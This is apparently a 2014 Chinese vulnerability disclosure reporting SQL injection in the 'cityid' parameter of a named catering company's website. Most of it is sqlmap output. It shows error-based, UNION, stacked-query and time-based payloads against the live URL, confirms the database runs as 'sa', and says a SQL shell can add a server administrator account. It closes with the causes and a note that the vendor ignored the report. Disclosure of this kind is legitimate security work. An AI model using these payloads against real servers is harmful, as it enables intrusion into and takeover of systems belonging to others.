2014-04-01: 细节已通知厂商并且等待厂商处理中 2014-04-06: 厂商已经主动忽略漏洞,细节向公众公开
味捷餐饮有限公司官网存在注入漏洞致服务器沦陷
http://www.4007123123.com/userhome/ajax/getaddressbase.aspx?cityid=1存在sql注入
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: cityid Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: cityid=1' AND 4512=CONVERT(INT,(CHAR(58)+CHAR(110)+CHAR(114)+CHAR(118)+CHAR(58)+(SELECT (CASE WHEN (4512=4512) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(108)+CHAR(120)+CHAR(118)+CHAR(58))) AND 'Vtfi'='Vtfi Type: UNION query Title: Generic UNION query (NULL) - 17 columns Payload: cityid=1' UNION ALL SELECT NULL,CHAR(58)+CHAR(110)+CHAR(114)+CHAR(118)+CHAR(58)+CHAR(89)+CHAR(82)+CHAR(109)+CHAR(72)+CHAR(85)+CHAR(71)+CHAR(88)+CHAR(73)+CHAR(65)+CHAR(87)+CHAR(58)+CHAR(108)+CHAR(120)+CHAR(118)+CHAR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: cityid=1'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: cityid=1' WAITFOR DELAY '0:0:5'-----[13:49:15] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2005
用户 sa
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: cityid Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: cityid=1' AND 4512=CONVERT(INT,(CHAR(58)+CHAR(110)+CHAR(114)+CHAR(118)+CHAR(58)+(SELECT (CASE WHEN (4512=4512) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(108)+CHAR(120)+CHAR(118)+CHAR(58))) AND 'Vtfi'='Vtfi Type: UNION query Title: Generic UNION query (NULL) - 17 columns Payload: cityid=1' UNION ALL SELECT NULL,CHAR(58)+CHAR(110)+CHAR(114)+CHAR(118)+CHAR(58)+CHAR(89)+CHAR(82)+CHAR(109)+CHAR(72)+CHAR(85)+CHAR(71)+CHAR(88)+CHAR(73)+CHAR(65)+CHAR(87)+CHAR(58)+CHAR(108)+CHAR(120)+CHAR(118)+CHAR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: cityid=1'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: cityid=1' WAITFOR DELAY '0:0:5'-----[13:44:55] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2005[13:44:55] [INFO] fetching current usercurrent user: 'sa'
sql-shell下可添加服务器管理员用户:
[13:56:52] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2005[13:56:52] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or 'q' and press ENTERsql-shell>
服务器沦陷原因:1:存在sql注入,sa未降权,sqlserver运行在system权限下尽快修复吧
危害等级:无影响厂商忽略
忽略时间:2014-04-06 11:16
暂无
这。。。。
。。。。。